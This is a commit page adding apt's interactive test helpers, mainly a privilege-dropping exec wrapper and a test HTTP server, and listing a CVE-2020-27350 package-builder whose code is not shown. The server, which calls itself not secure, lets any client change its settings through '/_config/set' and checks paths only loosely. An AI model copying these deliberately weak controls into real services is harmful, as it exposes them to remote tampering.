summaryrefslogtreecommitdiffstats
path: root/test/interactive-helper
diff options
context:
space:
mode:
authorDaniel Baumann <daniel.baumann@progress-linux.org>2024-05-05 18:07:13 +0000
committerDaniel Baumann <daniel.baumann@progress-linux.org>2024-05-05 18:07:13 +0000
commit636c7dc17286d93d788c741d15fd756aeda066d5 (patch)
treee7ae158cc54f591041a061b9865bcae51854f15c /test/interactive-helper
parentInitial commit. (diff)
downloadapt-636c7dc17286d93d788c741d15fd756aeda066d5.tar.xz
apt-636c7dc17286d93d788c741d15fd756aeda066d5.zip
Adding upstream version 1.8.2.3.upstream/1.8.2.3upstream
Signed-off-by: Daniel Baumann <daniel.baumann@progress-linux.org>
Diffstat (limited to 'test/interactive-helper')
-rw-r--r--test/interactive-helper/CMakeLists.txt17
-rw-r--r--test/interactive-helper/aptdropprivs.cc27
-rw-r--r--test/interactive-helper/aptwebserver.cc1083
-rw-r--r--test/interactive-helper/createdeb-cve-2020-27350.cc325
-rw-r--r--test/interactive-helper/extract-control.cc45
-rw-r--r--test/interactive-helper/libnoprofile.c44
-rw-r--r--test/interactive-helper/mthdcat.cc22
-rw-r--r--test/interactive-helper/networkless-install-fixes/README5
-rw-r--r--test/interactive-helper/networkless-install-fixes/sources.test.list25
-rwxr-xr-xtest/interactive-helper/networkless-install-fixes/test.sh25
-rw-r--r--test/interactive-helper/rpmver.cc118
-rw-r--r--test/interactive-helper/teestream.h62
-rw-r--r--test/interactive-helper/test_fileutl.cc44
-rw-r--r--test/interactive-helper/test_udevcdrom.cc23
-rw-r--r--test/interactive-helper/testdeb.cc51
15 files changed, 1916 insertions, 0 deletions
diff --git a/test/interactive-helper/CMakeLists.txt b/test/interactive-helper/CMakeLists.txt
new file mode 100644
index 0000000..0de7d9c
--- /dev/null
+++ b/test/interactive-helper/CMakeLists.txt
@@ -0,0 +1,17 @@
+add_executable(mthdcat mthdcat.cc)
+target_link_libraries(mthdcat apt-pkg)
+add_executable(testdeb testdeb.cc)
+target_link_libraries(testdeb apt-pkg apt-inst)
+add_executable(extract-control extract-control.cc)
+target_link_libraries(extract-control apt-pkg apt-inst)
+add_executable(aptwebserver aptwebserver.cc)
+target_link_libraries(aptwebserver apt-pkg ${CMAKE_THREAD_LIBS_INIT})
+add_executable(aptdropprivs aptdropprivs.cc)
+target_link_libraries(aptdropprivs apt-pkg)
+add_executable(test_fileutl test_fileutl.cc)
+target_link_libraries(test_fileutl apt-pkg)
+add_executable(createdeb-cve-2020-27350 createdeb-cve-2020-27350.cc)
+
+
+add_library(noprofile SHARED libnoprofile.c)
+target_link_libraries(noprofile ${CMAKE_DL_LIBS})
diff --git a/test/interactive-helper/aptdropprivs.cc b/test/interactive-helper/aptdropprivs.cc
new file mode 100644
index 0000000..1cc04f3
--- /dev/null
+++ b/test/interactive-helper/aptdropprivs.cc
@@ -0,0 +1,27 @@
+#include <config.h>
+
+#include <apt-pkg/cmndline.h>
+#include <apt-pkg/configuration.h>
+#include <apt-pkg/error.h>
+#include <apt-pkg/fileutl.h>
+
+#include <unistd.h>
+
+int main(int const argc, const char * argv[])
+{
+ CommandLine::Args Args[] = {
+ {'c',"config-file",0,CommandLine::ConfigFile},
+ {'o',"option",0,CommandLine::ArbItem},
+ {0, "user", "APT::Sandbox::User", CommandLine::HasArg},
+ {0,0,0,0}
+ };
+
+ CommandLine CmdL(Args, _config);
+ if(CmdL.Parse(argc,argv) == false || DropPrivileges() == false)
+ {
+ _error->DumpErrors(std::cerr, GlobalError::DEBUG);
+ return 42;
+ }
+
+ return execv(CmdL.FileList[0], const_cast<char**>(CmdL.FileList));
+}
diff --git a/test/interactive-helper/aptwebserver.cc b/test/interactive-helper/aptwebserver.cc
new file mode 100644
index 0000000..2243cce
--- /dev/null
+++ b/test/interactive-helper/aptwebserver.cc
@@ -0,0 +1,1083 @@
+#include <config.h>
+
+#include <apt-pkg/cmndline.h>
+#include <apt-pkg/configuration.h>
+#include <apt-pkg/error.h>
+#include <apt-pkg/fileutl.h>
+#include <apt-pkg/strutl.h>
+
+#include "teestream.h"
+
+#include <dirent.h>
+#include <errno.h>
+#include <netinet/in.h>
+#include <regex.h>
+#include <signal.h>
+#include <stddef.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <time.h>
+#include <unistd.h>
+
+#include <algorithm>
+#include <fstream>
+#include <iostream>
+#include <list>
+#include <sstream>
+#include <string>
+#include <thread>
+#include <unordered_map>
+#include <vector>
+
+static std::string HTMLEncode(std::string encode) /*{{{*/
+{
+ constexpr std::array<std::array<char const *,2>,6> htmlencode = {{
+ {{ "&", "&amp;" }},
+ {{ "<", "&lt;" }},
+ {{ ">", "&gt;" }},
+ {{ "\"", "&quot;" }},
+ {{ "'", "&#x27;" }},
+ {{ "/", "&#x2F;" }},
+ }};
+ for (auto &&h: htmlencode)
+ encode = SubstVar(encode, h[0], h[1]);
+ return encode;
+}
+ /*}}}*/
+static std::string httpcodeToStr(int const httpcode) /*{{{*/
+{
+ switch (httpcode)
+ {
+ // Informational 1xx
+ case 100: return _config->Find("aptwebserver::httpcode::100", "100 Continue");
+ case 101: return _config->Find("aptwebserver::httpcode::101", "101 Switching Protocols");
+ // Successful 2xx
+ case 200: return _config->Find("aptwebserver::httpcode::200", "200 OK");
+ case 201: return _config->Find("aptwebserver::httpcode::201", "201 Created");
+ case 202: return _config->Find("aptwebserver::httpcode::202", "202 Accepted");
+ case 203: return _config->Find("aptwebserver::httpcode::203", "203 Non-Authoritative Information");
+ case 204: return _config->Find("aptwebserver::httpcode::204", "204 No Content");
+ case 205: return _config->Find("aptwebserver::httpcode::205", "205 Reset Content");
+ case 206: return _config->Find("aptwebserver::httpcode::206", "206 Partial Content");
+ // Redirections 3xx
+ case 300: return _config->Find("aptwebserver::httpcode::300", "300 Multiple Choices");
+ case 301: return _config->Find("aptwebserver::httpcode::301", "301 Moved Permanently");
+ case 302: return _config->Find("aptwebserver::httpcode::302", "302 Found");
+ case 303: return _config->Find("aptwebserver::httpcode::303", "303 See Other");
+ case 304: return _config->Find("aptwebserver::httpcode::304", "304 Not Modified");
+ case 305: return _config->Find("aptwebserver::httpcode::305", "305 Use Proxy");
+ case 307: return _config->Find("aptwebserver::httpcode::307", "307 Temporary Redirect");
+ case 308: return _config->Find("aptwebserver::httpcode::308", "308 Permanent Redirect");
+ // Client errors 4xx
+ case 400: return _config->Find("aptwebserver::httpcode::400", "400 Bad Request");
+ case 401: return _config->Find("aptwebserver::httpcode::401", "401 Unauthorized");
+ case 402: return _config->Find("aptwebserver::httpcode::402", "402 Payment Required");
+ case 403: return _config->Find("aptwebserver::httpcode::403", "403 Forbidden");
+ case 404: return _config->Find("aptwebserver::httpcode::404", "404 Not Found");
+ case 405: return _config->Find("aptwebserver::httpcode::405", "405 Method Not Allowed");
+ case 406: return _config->Find("aptwebserver::httpcode::406", "406 Not Acceptable");
+ case 407: return _config->Find("aptwebserver::httpcode::407", "407 Proxy Authentication Required");
+ case 408: return _config->Find("aptwebserver::httpcode::408", "408 Request Time-out");
+ case 409: return _config->Find("aptwebserver::httpcode::409", "409 Conflict");
+ case 410: return _config->Find("aptwebserver::httpcode::410", "410 Gone");
+ case 411: return _config->Find("aptwebserver::httpcode::411", "411 Length Required");
+ case 412: return _config->Find("aptwebserver::httpcode::412", "412 Precondition Failed");
+ case 413: return _config->Find("aptwebserver::httpcode::413", "413 Request Entity Too Large");
+ case 414: return _config->Find("aptwebserver::httpcode::414", "414 Request-URI Too Large");
+ case 415: return _config->Find("aptwebserver::httpcode::415", "415 Unsupported Media Type");
+ case 416: return _config->Find("aptwebserver::httpcode::416", "416 Requested range not satisfiable");
+ case 417: return _config->Find("aptwebserver::httpcode::417", "417 Expectation Failed");
+ case 418: return _config->Find("aptwebserver::httpcode::418", "418 I'm a teapot");
+ // Server error 5xx
+ case 500: return _config->Find("aptwebserver::httpcode::500", "500 Internal Server Error");
+ case 501: return _config->Find("aptwebserver::httpcode::501", "501 Not Implemented");
+ case 502: return _config->Find("aptwebserver::httpcode::502", "502 Bad Gateway");
+ case 503: return _config->Find("aptwebserver::httpcode::503", "503 Service Unavailable");
+ case 504: return _config->Find("aptwebserver::httpcode::504", "504 Gateway Time-out");
+ case 505: return _config->Find("aptwebserver::httpcode::505", "505 HTTP Version not supported");
+ }
+ std::string codeconf, code;
+ strprintf(codeconf, "aptwebserver::httpcode::%i", httpcode);
+ strprintf(code, "%i Unknown HTTP code", httpcode);
+ return _config->Find(codeconf, code);
+}
+ /*}}}*/
+static bool chunkedTransferEncoding(std::list<std::string> const &headers)/*{{{*/
+{
+ if (std::find(headers.begin(), headers.end(), "Transfer-Encoding: chunked") != headers.end())
+ return true;
+ if (_config->FindB("aptwebserver::chunked-transfer-encoding", false) == true)
+ return true;
+ return false;
+}
+ /*}}}*/
+static bool contentTypeSet(std::list<std::string> const &headers) /*{{{*/
+{
+ return std::any_of(headers.begin(), headers.end(), [](std::string const &h) { return APT::String::Startswith(h, "Content-Type:"); });
+}
+ /*}}}*/
+// contentTypeFromExtension /*{{{*/
+static std::string contentTypeFromExtension(std::string const &ext)
+{
+ auto t = _config->Find(std::string("aptwebserver::content-type::by-extension::").append(ext));
+ if (APT::String::Startswith(t, "text/"))
+ return t.append("; charset=utf-8");
+ return t;
+}
+ /*}}}*/
+static void addFileHeaders(std::list<std::string> &headers, FileFd &data)/*{{{*/
+{
+ if (chunkedTransferEncoding(headers) == false)
+ {
+ std::ostringstream contentlength;
+ contentlength << "Content-Length: " << data.FileSize();
+ headers.push_back(contentlength.str());
+ }
+ if (_config->FindB("aptwebserver::support::last-modified", true) == true)
+ {
+ std::string lastmodified("Last-Modified: ");
+ lastmodified.append(TimeRFC1123(data.ModificationTime(), false));
+ headers.push_back(lastmodified);
+ }
+ if (_config->FindB("aptwebserver::content-type::guess", true) &&
+ data.FileSize() != 0 &&
+ contentTypeSet(headers) == false)
+ {
+ std::string const name = data.Name();
+ std::string ext = flExtension(name);
+ if (name.empty() == false && ext.empty() == false && name != ext)
+ {
+ std::transform(ext.begin(), ext.end(), ext.begin(), ::tolower);
+ auto const type = contentTypeFromExtension(ext);
+ if (type.empty() == false)
+ headers.push_back(std::string("Content-Type: ").append(type));
+ }
+ }
+}
+ /*}}}*/
+static void addDataHeaders(std::list<std::string> &headers, std::string &data)/*{{{*/
+{
+ if (chunkedTransferEncoding(headers) == false)
+ {
+ std::ostringstream contentlength;
+ contentlength << "Content-Length: " << data.size();
+ headers.push_back(contentlength.str());
+ }
+}
+ /*}}}*/
+static bool sendHead(std::ostream &log, int const client, int const httpcode, std::list<std::string> &headers)/*{{{*/
+{
+ std::string response("HTTP/1.1 ");
+ response.append(httpcodeToStr(httpcode));
+ headers.push_front(response);
+ _config->Set("APTWebserver::Last-Status-Code", httpcode);
+
+ std::stringstream buffer;
+ auto const empties = _config->FindVector("aptwebserver::empty-response-header");
+ for (auto const &e: empties)
+ buffer << e << ":" << std::endl;
+ _config->Dump(buffer, "aptwebserver::response-header", "%t: %v%n", false);
+ std::vector<std::string> addheaders = VectorizeString(buffer.str(), '\n');
+ for (std::vector<std::string>::const_iterator h = addheaders.begin(); h != addheaders.end(); ++h)
+ headers.push_back(*h);
+
+ std::string date("Date: ");
+ date.append(TimeRFC1123(time(NULL), false));
+ headers.push_back(date);
+
+ if (chunkedTransferEncoding(headers) == true)
+ headers.push_back("Transfer-Encoding: chunked");
+
+ log << ">>> RESPONSE to " << client << " >>>" << std::endl;
+ bool Success = true;
+ for (std::list<std::string>::const_iterator h = headers.begin();
+ Success == true && h != headers.end(); ++h)
+ {
+ Success &= FileFd::Write(client, h->c_str(), h->size());
+ if (Success == true)
+ Success &= FileFd::Write(client, "\r\n", 2);
+ log << *h << std::endl;
+ }
+ if (Success == true)
+ Success &= FileFd::Write(client, "\r\n", 2);
+ log << "<<<<<<<<<<<<<<<<" << std::endl;
+ return Success;
+}
+ /*}}}*/
+static bool sendFile(int const client, std::list<std::string> const &headers, FileFd &data)/*{{{*/
+{
+ bool Success = true;
+ bool const chunked = chunkedTransferEncoding(headers);
+ char buffer[500];
+ unsigned long long actual = 0;
+ while ((Success &= data.Read(buffer, sizeof(buffer), &actual)) == true)
+ {
+ if (actual == 0)
+ break;
+
+ if (chunked == true)
+ {
+ std::string size;
+ strprintf(size, "%llX\r\n", actual);
+ Success &= FileFd::Write(client, size.c_str(), size.size());
+ Success &= FileFd::Write(client, buffer, actual);
+ Success &= FileFd::Write(client, "\r\n", strlen("\r\n"));
+ }
+ else
+ Success &= FileFd::Write(client, buffer, actual);
+ }
+ if (chunked == true)
+ {
+ char const * const finish = "0\r\n\r\n";
+ Success &= FileFd::Write(client, finish, strlen(finish));
+ }
+ if (Success == false)
+ std::cerr << "SENDFILE:" << (chunked ? " CHUNKED" : "") << " READ/WRITE ERROR to " << client << std::endl;
+ return Success;
+}
+ /*}}}*/
+static bool sendData(int const client, std::list<std::string> const &headers, std::string const &data)/*{{{*/
+{
+ if (chunkedTransferEncoding(headers) == true)
+ {
+ unsigned long long const ullsize = data.length();
+ std::string size;
+ strprintf(size, "%llX\r\n", ullsize);
+ char const * const finish = "\r\n0\r\n\r\n";
+ if (FileFd::Write(client, size.c_str(), size.length()) == false ||
+ FileFd::Write(client, data.c_str(), ullsize) == false ||
+ FileFd::Write(client, finish, strlen(finish)) == false)
+ {
+ std::cerr << "SENDDATA: CHUNK WRITE ERROR to " << client << std::endl;
+ return false;
+ }
+ }
+ else if (FileFd::Write(client, data.c_str(), data.size()) == false)
+ {
+ std::cerr << "SENDDATA: WRITE ERROR to " << client << std::endl;
+ return false;
+ }
+ return true;
+}
+ /*}}}*/
+static void sendError(std::ostream &log, int const client, int const httpcode, std::string const &request,/*{{{*/
+ bool const content, std::string const &error, std::list<std::string> &headers)
+{
+ auto const quotedCode = HTMLEncode(httpcodeToStr(httpcode));
+ std::string response("<!doctype html><html><head><title>");
+ response.append(quotedCode).append("</title><meta charset=\"utf-8\" /></head>");
+ response.append("<body><h1>").append(quotedCode).append("</h1>");
+ if (httpcode != 200)
+ response.append("<p><em>Error</em>: ");
+ else
+ response.append("<p><em>Success</em>: ");
+ if (error.empty() == false)
+ response.append(HTMLEncode(error));
+ else
+ response.append(quotedCode);
+ if (httpcode != 200)
+ response.append("</p>This error is a result of the request: <pre>");
+ else
+ response.append("The successfully executed operation was requested by: <pre>");
+ response.append(HTMLEncode(request)).append("</pre></body></html>");
+ if (httpcode != 200)
+ {
+ if (_config->FindB("aptwebserver::closeOnError", false) == true)
+ headers.push_back("Connection: close");
+ }
+ addDataHeaders(headers, response);
+
+ if (contentTypeSet(headers) == false)
+ headers.push_back("Content-Type: text/html; charset=utf-8");
+
+ sendHead(log, client, httpcode, headers);
+ if (content == true)
+ sendData(client, headers, response);
+}
+static void sendSuccess(std::ostream &log, int const client, std::string const &request,
+ bool const content, std::string const &error, std::list<std::string> &headers)
+{
+ sendError(log, client, 200, request, content, error, headers);
+}
+ /*}}}*/
+static void sendRedirect(std::ostream &log, int const client, int const httpcode,/*{{{*/
+ std::string const &uri, std::string const &request, bool content)
+{
+ std::list<std::string> headers;
+ auto const quotedCode = HTMLEncode(httpcodeToStr(httpcode));
+ std::string response("<!doctype html><html><head><title>");
+ response.append(quotedCode).append("</title><meta charset=\"utf-8\" /></head>");
+ response.append("<body><h1>").append(quotedCode).append("</h1");
+ response.append("<p>You should be redirected to <em>").append(HTMLEncode(uri)).append("</em></p>");
+ response.append("This page is a result of the request: <pre>");
+ response.append(HTMLEncode(request)).append("</pre></body></html>");
+ addDataHeaders(headers, response);
+ std::string location("Location: ");
+ if (strncmp(uri.c_str(), "http://", 7) != 0 && strncmp(uri.c_str(), "https://", 8) != 0)
+ {
+ std::string const host = LookupTag(request, "Host");
+ unsigned int const httpsport = _config->FindI("aptwebserver::port::https", 4433);
+ std::string hosthttpsport;
+ strprintf(hosthttpsport, ":%u", httpsport);
+ if (host.find(hosthttpsport) != std::string::npos)
+ location.append("https://");
+ else
+ location.append("http://");
+ location.append(host).append("/");
+ if (strncmp("/home/", uri.c_str(), strlen("/home/")) == 0 && uri.find("/public_html/") != std::string::npos)
+ {
+ std::string homeuri = SubstVar(uri, "/home/", "~");
+ homeuri = SubstVar(homeuri, "/public_html/", "/");
+ location.append(homeuri);
+ }
+ else
+ location.append(uri);
+ }
+ else
+ location.append(uri);
+ headers.push_back(location);
+
+ if (contentTypeSet(headers) == false)
+ headers.push_back("Content-Type: text/html; charset=utf-8");
+
+ sendHead(log, client, httpcode, headers);
+ if (content == true)
+ sendData(client, headers, response);
+}
+ /*}}}*/
+static int filter_hidden_files(const struct dirent *a) /*{{{*/
+{
+ if (a->d_name[0] == '.')
+ return 0;
+#ifdef _DIRENT_HAVE_D_TYPE
+ // if we have the d_type check that only files and dirs will be included
+ if (a->d_type != DT_UNKNOWN &&
+ a->d_type != DT_REG &&
+ a->d_type != DT_LNK && // this includes links to regular files
+ a->d_type != DT_DIR)
+ return 0;
+#endif
+ return 1;
+}
+static int grouped_alpha_case_sort(const struct dirent **a, const struct dirent **b) {
+#ifdef _DIRENT_HAVE_D_TYPE
+ if ((*a)->d_type == DT_DIR && (*b)->d_type == DT_DIR);
+ else if ((*a)->d_type == DT_DIR && (*b)->d_type == DT_REG)
+ return -1;
+ else if ((*b)->d_type == DT_DIR && (*a)->d_type == DT_REG)
+ return 1;
+ else
+#endif
+ {
+ struct stat f_prop; //File's property
+ stat((*a)->d_name, &f_prop);
+ int const amode = f_prop.st_mode;
+ stat((*b)->d_name, &f_prop);
+ int const bmode = f_prop.st_mode;
+ if (S_ISDIR(amode) && S_ISDIR(bmode));
+ else if (S_ISDIR(amode))
+ return -1;
+ else if (S_ISDIR(bmode))
+ return 1;
+ }
+ return strcasecmp((*a)->d_name, (*b)->d_name);
+}
+ /*}}}*/
+static void sendDirectoryListing(std::ostream &log, int const client, std::string const &dir,/*{{{*/
+ std::string const &request, bool content, std::list<std::string> &headers)
+{
+ struct dirent **namelist;
+ int const counter = scandir(dir.c_str(), &namelist, filter_hidden_files, grouped_alpha_case_sort);
+ if (counter == -1)
+ {
+ sendError(log, client, 500, request, content, "scandir failed", headers);
+ return;
+ }
+
+ std::ostringstream listing;
+ std::string const quotedDir = HTMLEncode(dir);
+ listing << "<!doctype html><html><head><title>Index of " << quotedDir << "</title><meta charset=\"utf-8\" />"
+ << "<style type=\"text/css\"><!-- td {padding: 0.02em 0.5em 0.02em 0.5em;}"
+ << "tr:nth-child(even){background-color:#dfdfdf;}"
+ << "h1, td:nth-child(3){text-align:center;}"
+ << "table {margin-left:auto;margin-right:auto;} --></style>"
+ << "</head>" << std::endl
+ << "<body><h1>Index of " << quotedDir << "</h1>" << std::endl
+ << "<table><tr><th>#</th><th>Name</th><th>Size</th><th>Last-Modified</th></tr>" << std::endl;
+ if (dir != "./")
+ listing << "<tr><td>d</td><td><a href=\"..\">Parent Directory</a></td><td>-</td><td>-</td></tr>";
+ for (int i = 0; i < counter; ++i) {
+ struct stat fs;
+ std::string filename(dir);
+ filename.append("/").append(namelist[i]->d_name);
+ stat(filename.c_str(), &fs);
+ std::string const quotedHref = QuoteString(namelist[i]->d_name, "\"\\/#?");
+ std::string const quotedName = HTMLEncode(namelist[i]->d_name);
+ bool const isDir = S_ISDIR(fs.st_mode);
+ listing << "<tr><td>" << (isDir ? 'd' : 'f') << "</td>"
+ << "<td><a href=\"./" << quotedHref << (isDir ? "/" : "") <<"\">" << quotedName << "</a></td>"
+ << "<td>" << (isDir ? "-" : SizeToStr(fs.st_size).append("B")) << "</td>"
+ << "<td>" << TimeRFC1123(fs.st_mtime, true) << "</td></tr>\n";
+ }
+ listing << "</table></body></html>" << std::endl;
+
+ if (contentTypeSet(headers) == false)
+ headers.push_back("Content-Type: text/html; charset=utf-8");
+
+ std::string response(listing.str());
+ addDataHeaders(headers, response);
+ sendHead(log, client, 200, headers);
+ if (content == true)
+ sendData(client, headers, response);
+}
+ /*}}}*/
+static bool parseFirstLine(std::ostream &log, int const client, std::string const &request,/*{{{*/
+ std::string &filename, std::string &params, bool &sendContent,
+ bool &closeConnection, std::list<std::string> &headers)
+{
+ if (strncmp(request.c_str(), "HEAD ", 5) == 0)
+ sendContent = false;
+ if (strncmp(request.c_str(), "GET ", 4) != 0)
+ {
+ sendError(log, client, 501, request, true, "", headers);
+ return false;
+ }
+
+ size_t const lineend = request.find('\n');
+ size_t filestart = request.find(' ');
+ for (; request[filestart] == ' '; ++filestart);
+ size_t fileend = request.rfind(' ', lineend);
+ if (lineend == std::string::npos || filestart == std::string::npos ||
+ fileend == std::string::npos || filestart == fileend)
+ {
+ sendError(log, client, 500, request, sendContent, "Filename can't be extracted", headers);
+ return false;
+ }
+
+ size_t httpstart = fileend;
+ for (; request[httpstart] == ' '; ++httpstart);
+ if (strncmp(request.c_str() + httpstart, "HTTP/1.1\r", 9) == 0)
+ closeConnection = strcasecmp(LookupTag(request, "Connection", "Keep-Alive").c_str(), "Keep-Alive") != 0;
+ else if (strncmp(request.c_str() + httpstart, "HTTP/1.0\r", 9) == 0)
+ closeConnection = strcasecmp(LookupTag(request, "Connection", "Keep-Alive").c_str(), "close") == 0;
+ else
+ {
+ sendError(log, client, 500, request, sendContent, "Not an HTTP/1.{0,1} request", headers);
+ return false;
+ }
+
+ filename = request.substr(filestart, fileend - filestart);
+ if (filename.find(' ') != std::string::npos)
+ {
+ sendError(log, client, 500, request, sendContent, "Filename contains an unencoded space", headers);
+ return false;
+ }
+
+ std::string host = LookupTag(request, "Host", "");
+ if (host.empty() == true)
+ {
+ // RFC 2616 §14.23 requires Host
+ sendError(log, client, 400, request, sendContent, "Host header is required", headers);
+ return false;
+ }
+ host = "http://" + host;
+
+ // Proxies require absolute uris, so this is a simple proxy-fake option
+ std::string const absolute = _config->Find("aptwebserver::request::absolute", "uri,path");
+ if (strncmp(host.c_str(), filename.c_str(), host.length()) == 0 && APT::String::Startswith(filename, "/_config/") == false)
+ {
+ if (absolute.find("uri") == std::string::npos)
+ {
+ sendError(log, client, 400, request, sendContent, "Request is absoluteURI, but configured to not accept that", headers);
+ return false;
+ }
+
+ // strip the host from the request to make it an absolute path
+ filename.erase(0, host.length());
+
+ std::string const authConf = _config->Find("aptwebserver::proxy-authorization", "");
+ std::string auth = LookupTag(request, "Proxy-Authorization", "");
+ if (authConf.empty() != auth.empty())
+ {
+ if (auth.empty())
+ sendError(log, client, 407, request, sendContent, "Proxy requires authentication", headers);
+ else
+ sendError(log, client, 407, request, sendContent, "Client wants to authenticate to proxy, but proxy doesn't need it", headers);
+ return false;
+ }
+ if (authConf.empty() == false)
+ {
+ char const * const basic = "Basic ";
+ if (strncmp(auth.c_str(), basic, strlen(basic)) == 0)
+ {
+ auth.erase(0, strlen(basic));
+ if (auth != authConf)
+ {
+ sendError(log, client, 407, request, sendContent, "Proxy-Authentication doesn't match", headers);
+ return false;
+ }
+ }
+ else
+ {
+ std::list<std::string> headers;
+ headers.push_back("Proxy-Authenticate: Basic");
+ sendError(log, client, 407, request, sendContent, "Unsupported Proxy-Authentication Scheme", headers);
+ return false;
+ }
+ }
+ }
+ else if (absolute.find("path") == std::string::npos && APT::String::Startswith(filename, "/_config/") == false)
+ {
+ sendError(log, client, 400, request, sendContent, "Request is absolutePath, but configured to not accept that", headers);
+ return false;
+ }
+
+ if (APT::String::Startswith(filename, "/_config/") == false)
+ {
+ std::string const authConf = _config->Find("aptwebserver::authorization", "");
+ std::string auth = LookupTag(request, "Authorization", "");
+ if (authConf.empty() != auth.empty())
+ {
+ if (auth.empty())
+ sendError(log, client, 401, request, sendContent, "Server requires authentication", headers);
+ else
+ sendError(log, client, 401, request, sendContent, "Client wants to authenticate to server, but server doesn't need it", headers);
+ return false;
+ }
+ if (authConf.empty() == false)
+ {
+ char const * const basic = "Basic ";
+ if (strncmp(auth.c_str(), basic, strlen(basic)) == 0)
+ {
+ auth.erase(0, strlen(basic));
+ if (auth != authConf)
+ {
+ sendError(log, client, 401, request, sendContent, "Authentication doesn't match", headers);
+ return false;
+ }
+ }
+ else
+ {
+ headers.push_back("WWW-Authenticate: Basic");
+ sendError(log, client, 401, request, sendContent, "Unsupported Authentication Scheme", headers);
+ return false;
+ }
+ }
+ }
+
+ size_t paramspos = filename.find('?');
+ if (paramspos != std::string::npos)
+ {
+ params = filename.substr(paramspos + 1);
+ filename.erase(paramspos);
+ }
+
+ filename = DeQuoteString(filename);
+
+ // this is not a secure server, but at least prevent the obvious …
+ if (filename.empty() == true || filename[0] != '/' ||
+ strncmp(filename.c_str(), "//", 2) == 0 ||
+ filename.find_first_of("\r\n\t\f\v") != std::string::npos ||
+ filename.find("/../") != std::string::npos)
+ {
+ std::list<std::string> headers;
+ sendError(log, client, 400, request, sendContent, "Filename contains illegal character (sequence)", headers);
+ return false;
+ }
+
+ // nuke the first character which is a / as we assured above
+ filename.erase(0, 1);
+ if (filename.empty() == true)
+ filename = "./";
+ // support ~user/ uris to refer to /home/user/public_html/ as a kind-of special directory
+ else if (filename[0] == '~')
+ {
+ // /home/user is actually not entirely correct, but good enough for now
+ size_t dashpos = filename.find('/');
+ if (dashpos != std::string::npos)
+ {
+ std::string home = filename.substr(1, filename.find('/') - 1);
+ std::string pubhtml = filename.substr(filename.find('/') + 1);
+ filename = "/home/" + home + "/public_html/" + pubhtml;
+ }
+ else
+ filename = "/home/" + filename.substr(1) + "/public_html/";
+ }
+
+ // if no filename is given, but a valid directory see if we can use an index or
+ // have to resort to a autogenerated directory listing later on
+ if (DirectoryExists(filename) == true)
+ {
+ std::string const directoryIndex = _config->Find("aptwebserver::directoryindex");
+ if (directoryIndex.empty() == false && directoryIndex == flNotDir(directoryIndex) &&
+ RealFileExists(filename + directoryIndex) == true)
+ filename += directoryIndex;
+ }
+
+ return true;
+}
+ /*}}}*/
+static bool handleOnTheFlyReconfiguration(std::ostream &log, int const client,/*{{{*/
+ std::string const &request, std::vector<std::string> parts, std::list<std::string> &headers)
+{
+ size_t const pcount = parts.size();
+ for (size_t i = 0; i < pcount; ++i)
+ parts[i] = DeQuoteString(parts[i]);
+ if (pcount == 4 && parts[1] == "set")
+ {
+ _config->Set(parts[2], parts[3]);
+ sendSuccess(log, client, request, true, "Option '" + parts[2] + "' was set to '" + parts[3] + "'!", headers);
+ return true;
+ }
+ else if (pcount == 4 && parts[1] == "find")
+ {
+ std::string response = _config->Find(parts[2], parts[3]);
+ addDataHeaders(headers, response);
+ if (contentTypeSet(headers) == false)
+ headers.push_back("Content-Type: text/plain; charset=utf-8");
+ sendHead(log, client, 200, headers);
+ sendData(client, headers, response);
+ return true;
+ }
+ else if (pcount == 3 && parts[1] == "find")
+ {
+ if (_config->Exists(parts[2]) == true)
+ {
+ std::string response = _config->Find(parts[2]);
+ addDataHeaders(headers, response);
+ if (contentTypeSet(headers) == false)
+ headers.push_back("Content-Type: text/plain; charset=utf-8");
+ sendHead(log, client, 200, headers);
+ sendData(client, headers, response);
+ return true;
+ }
+ sendError(log, client, 404, request, true, "Requested Configuration option doesn't exist", headers);
+ return false;
+ }
+ else if (pcount == 3 && parts[1] == "clear")
+ {
+ _config->Clear(parts[2]);
+ sendSuccess(log, client, request, true, "Option '" + parts[2] + "' was cleared.", headers);
+ return true;
+ }
+
+ sendError(log, client, 400, request, true, "Unknown on-the-fly configuration request", headers);
+ return false;
+}
+ /*}}}*/
+static void * handleClient(int const client, size_t const id) /*{{{*/
+{
+ auto logfilepath = _config->FindFile("aptwebserver::logfiles");
+ if (logfilepath.empty() == false)
+ strprintf(logfilepath, "%s.client-%lu.log", logfilepath.c_str(), id);
+ else
+ logfilepath = "/dev/null";
+ std::ofstream logfile(logfilepath);
+ basic_teeostream<char> log(std::clog, logfile);
+
+ log << "ACCEPT client " << client << std::endl;
+ bool closeConnection = false;
+ while (closeConnection == false)
+ {
+ std::vector<std::string> messages;
+ if (ReadMessages(client, messages) == false)
+ break;
+
+ std::list<std::string> headers;
+ for (std::vector<std::string>::const_iterator m = messages.begin();
+ m != messages.end() && closeConnection == false; ++m) {
+ // if we announced a closing in previous response, do the close now
+ if (std::find(headers.begin(), headers.end(), std::string("Connection: close")) != headers.end())
+ {
+ closeConnection = true;
+ break;
+ }
+ headers.clear();
+
+ log << ">>> REQUEST from " << client << " >>>" << std::endl << *m
+ << std::endl << "<<<<<<<<<<<<<<<<" << std::endl;
+ std::string filename;
+ std::string params;
+ bool sendContent = true;
+ if (parseFirstLine(log, client, *m, filename, params, sendContent, closeConnection, headers) == false)
+ continue;
+
+ // special webserver command request
+ if (filename.length() > 1 && filename[0] == '_')
+ {
+ std::vector<std::string> parts = VectorizeString(filename, '/');
+ if (parts[0] == "_config")
+ {
+ handleOnTheFlyReconfiguration(log, client, *m, parts, headers);
+ continue;
+ }
+ }
+
+ // string replacements in the requested filename
+ ::Configuration::Item const *Replaces = _config->Tree("aptwebserver::redirect::replace");
+ if (Replaces != NULL)
+ {
+ std::string redirect = "/" + filename;
+ for (::Configuration::Item *I = Replaces->Child; I != NULL; I = I->Next)
+ redirect = SubstVar(redirect, I->Tag, I->Value);
+ if (redirect.empty() == false && redirect[0] == '/')
+ redirect.erase(0,1);
+ if (redirect != filename)
+ {
+ sendRedirect(log, client, _config->FindI("aptwebserver::redirect::httpcode", 301), redirect, *m, sendContent);
+ continue;
+ }
+ }
+
+ ::Configuration::Item const *Overwrite = _config->Tree("aptwebserver::overwrite");
+ if (Overwrite != NULL)
+ {
+ for (::Configuration::Item *I = Overwrite->Child; I != NULL; I = I->Next)
+ {
+ regex_t *pattern = new regex_t;
+ int const res = regcomp(pattern, I->Tag.c_str(), REG_EXTENDED | REG_ICASE | REG_NOSUB);
+ if (res != 0)
+ {
